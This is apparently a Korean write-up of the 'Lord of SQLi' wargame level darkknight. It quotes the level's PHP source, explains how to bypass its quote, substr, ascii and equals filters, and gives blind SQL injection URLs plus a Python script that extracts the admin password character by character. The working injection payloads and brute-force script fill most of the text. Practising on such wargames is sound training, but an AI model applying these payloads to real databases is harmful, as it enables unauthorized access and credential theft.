los 11번

query : {$query}

"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "
Hello {$result[id]}
"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

pw에 ' 가 들어가면 안되고

no에 ' substr ascii = 가 들어가면 안된다

substr->right, left를 이용한다.

substr('abc',2,1)==right(left('abc',2),1)

=->like

'이 들어가면 안되므로 'admin'을 0x61646d696e로 써준다.

?pw=1&no=123||id like 0x61646d696e and length(pw)>5

?pw=1&no=123||id like 0x61646d696e and right(left(pw,3),1)>char(50)

import requests

def main():
	cookie={"__cfduid":"d282347679afbe7ce118657ef96dd67f61530072154","PHPSESSID":"25bfqp0uqr6pmep83spki2t522"}

	query='https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php'
	for i in range(1,9):
		x=30
		while(1):
			x+=1
			query_add=query+"?pw=1&no=123||id like 0x61646d696e and right(left(pw,"+str(i)+"),1)>char("+str(x)+")"
			result=requests.get(query_add, cookies=cookie)
			if(result.text.find("Hello")>1000):
				print("GOOD "+str(i)+": "+chr(x))
				break


if(__name__=="__main__"):
	main()